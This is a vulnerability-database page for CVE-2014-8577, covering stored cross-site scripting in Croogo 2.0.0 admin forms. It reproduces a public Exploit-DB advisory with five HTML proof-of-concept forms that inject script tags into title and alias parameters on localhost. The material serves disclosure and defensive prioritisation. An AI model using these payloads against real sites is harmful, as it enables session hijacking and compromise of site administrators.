CVE-2014-8577

medium

Published 2014-10-31 · Modified 2026-05-06

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

5.3

Description

Multiple cross-site scripting (XSS) vulnerabilities in Croogo before 2.1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) data[Contact][title] parameter to admin/contacts/contacts/add page; (2) data[Block][title] or (3) data[Block][alias] parameter to admin/blocks/blocks/edit page; (4) data[Region][title] parameter to admin/blocks/regions/add page; (5) data[Menu][title] or (6) data[Menu][alias] parameter to admin/menus/menus/add page; or (7) data[Link][title] parameter to admin/menus/links/add/menu page.

Predictions

Exploit likelihood

20%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-34959 webapps php text · 9 KB

LiquidWorm · 2014-10-14

Croogo 2.0.0 - Multiple Persistent Cross-Site Scripting Vulnerabilities

text exploit Source: Exploit-DB

<<<

Croogo 2.0.0 Multiple Stored XSS Vulnerabilities


Vendor: Fahad Ibnay Heylaal
Product web page: http://www.croogo.org
Affected version: 2.0.0

Summary: Croogo is a free, open source, content management system
for PHP, released under The MIT License. It is powered by CakePHP
MVC framework.

Desc: Croogo version 2.0.0 suffers from multiple stored cross-site
scripting vulnerabilities. Input passed to several POST parameters
is not properly sanitised before being returned to the user. This
can be exploited to execute arbitrary HTML and script code in a
user's browser session in context of an affected site.

Tested on: Apache/2.4.7 (Win32)
           PHP/5.5.6
           MySQL 5.6.14


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
Zero Science Lab - http://www.zeroscience.mk
Macedonian Information Security Research And Development Laboratory


Advisory ID: ZSL-2014-5201
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5201.php

Vendor: http://blog.croogo.org/blog/croogo-210-released


26.07.2014

>>>


------------------------
(XSS #1)
--------
POST parameters:

 - data[Contact][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/contacts/contacts/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="2627e9e204ad6b878dbaf1c08d830c3e744d7e6e" />
      <input type="hidden" name="data[Contact][id]" value="" />
      <input type="hidden" name="data[Contact][title]" value=""><script>alert("XSS");</script>" />
      <input type="hidden" name="data[Contact][alias]" value="test" />
      <input type="hidden" name="data[Contact][email]" value="a@a.com" />
      <input type="hidden" name="data[Contact][body]" value="" />
      <input type="hidden" name="data[Contact][name]" value="" />
      <input type="hidden" name="data[Contact][position]" value="" />
      <input type="hidden" name="data[Contact][address]" value="" />
      <input type="hidden" name="data[Contact][address2]" value="" />
      <input type="hidden" name="data[Contact][state]" value="" />
      <input type="hidden" name="data[Contact][country]" value="" />
      <input type="hidden" name="data[Contact][postcode]" value="" />
      <input type="hidden" name="data[Contact][phone]" value="" />
      <input type="hidden" name="data[Contact][fax]" value="" />
      <input type="hidden" name="data[Contact][message_status]" value="0" />
      <input type="hidden" name="data[Contact][message_archive]" value="0" />
      <input type="hidden" name="data[Contact][message_notify]" value="0" />
      <input type="hidden" name="data[Contact][message_spam_protection]" value="0" />
      <input type="hidden" name="data[Contact][message_captcha]" value="0" />
      <input type="hidden" name="data[Contact][status]" value="0" />
      <input type="hidden" name="data[_Token][fields]" value="262e37f00fdd538ab98d168114e8befb72ba27ff%3AContact.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #2)
--------
POST/PUT parameters:

 - data[Block][title]
 - data[Block][alias]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/blocks/blocks/edit/10" method="POST">
      <input type="hidden" name="_method" value="PUT" />
      <input type="hidden" name="data[_Token][key]" value="bb5e47ab63281908e9783d9a20f66b7f56c573f3" />
      <input type="hidden" name="data[Block][id]" value="10" />
      <input type="hidden" name="data[Block][title]" value=""><script>alert(2);</script>" />
      <input type="hidden" name="data[Block][alias]" value=""><script>alert(3);</script>" />
      <input type="hidden" name="data[Block][region_id]" value="3" />
      <input type="hidden" name="data[Block][body]" value="1" />
      <input type="hidden" name="data[Block][class]" value="1" />
      <input type="hidden" name="data[Block][element]" value="1" />
      <input type="hidden" name="data[Role][Role]" value="" />
      <input type="hidden" name="data[Block][visibility_paths]" value="" />
      <input type="hidden" name="data[Block][params]" value="1" />
      <input type="hidden" name="data[Block][status]" value="1" />
      <input type="hidden" name="data[Block][show_title]" value="0" />
      <input type="hidden" name="data[Block][show_title]" value="1" />
      <input type="hidden" name="data[Block][publish_start]" value="0000-00-00 00:00:00" />
      <input type="hidden" name="data[Block][publish_end]" value="0000-00-00 00:00:00" />
      <input type="hidden" name="data[_Token][fields]" value="546f4a46648b8b32ea4c2b43a4a118ea7087e21b%3ABlock.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #3)
--------
POST parameters:

 - data[Region][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/blocks/regions/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="a7d62c8c34e2a6414c3657c43790645dfdd63735" />
      <input type="hidden" name="data[Region][id]" value="" />
      <input type="hidden" name="data[Region][title]" value=""><script>alert(11);</script>" />
      <input type="hidden" name="data[Region][alias]" value="1" />
      <input type="hidden" name="data[_Token][fields]" value="4020bcbfbf5ba648b159ec8a4e166f53c1b58aa4%3ARegion.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #4)
--------
POST parameters:

 - data[Menu][title]
 - data[Menu][alias]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/menus/menus/add" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="253c5c67942b2d126c886c9ac7a62ebf065cf42b" />
      <input type="hidden" name="data[Menu][id]" value="" />
      <input type="hidden" name="data[Menu][title]" value=""><script>alert(22);</script>" />
      <input type="hidden" name="data[Menu][alias]" value=""><script>alert(33);</script>" />
      <input type="hidden" name="data[Menu][description]" value="ZSL" />
      <input type="hidden" name="data[Menu][params]" value="1" />
      <input type="hidden" name="data[Menu][status]" value="1" />
      <input type="hidden" name="data[Menu][publish_start]" value="1" />
      <input type="hidden" name="data[Menu][publish_end]" value="1" />
      <input type="hidden" name="data[_Token][fields]" value="58685dc7a49f7617cffaa3a00ec4245516c5f9d3%3AMenu.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>


------------------------
(XSS #5)
--------
POST parameters:

 - data[Link][title]
------------------------

<html>
  <!-- PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://localhost/croogo/admin/menus/links/add/menu:6" method="POST">
      <input type="hidden" name="_method" value="POST" />
      <input type="hidden" name="data[_Token][key]" value="736e7539497307010b8cb8e70c44ec8a9798d0fb" />
      <input type="hidden" name="data[Link][id]" value="" />
      <input type="hidden" name="data[Link][menu_id]" value="6" />
      <input type="hidden" name="data[Link][parent_id]" value="" />
      <input type="hidden" name="data[Link][title]" value=""><script>alert(1);</script>" />
      <input type="hidden" name="data[Link][link]" value="1" />
      <input type="hidden" name="data[Role][Role]" value="" />
      <input type="hidden" name="data[Link][class]" value="scriptalert1script" />
      <input type="hidden" name="data[Link][description]" value="" />
      <input type="hidden" name="data[Link][rel]" value="" />
      <input type="hidden" name="data[Link][target]" value="" />
      <input type="hidden" name="data[Link][params]" value="" />
      <input type="hidden" name="data[Link][status]" value="0" />
      <input type="hidden" name="data[Link][publish_start]" value="" />
      <input type="hidden" name="data[Link][publish_end]" value="" />
      <input type="hidden" name="data[_Token][fields]" value="d662745abb348c763337f58c8c3c28bb1e8c014f%3ALink.id" />
      <input type="hidden" name="data[_Token][unlocked]" value="apply" />
      <input type="submit" value="Submit form" />
    </form>
  </body>
</html>

Application impact

Vendor	Product	Versions	Fixed
croogo	croogo	`{"endIncluding":"2.0.0"}`

References

CWEs

CWE-79

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.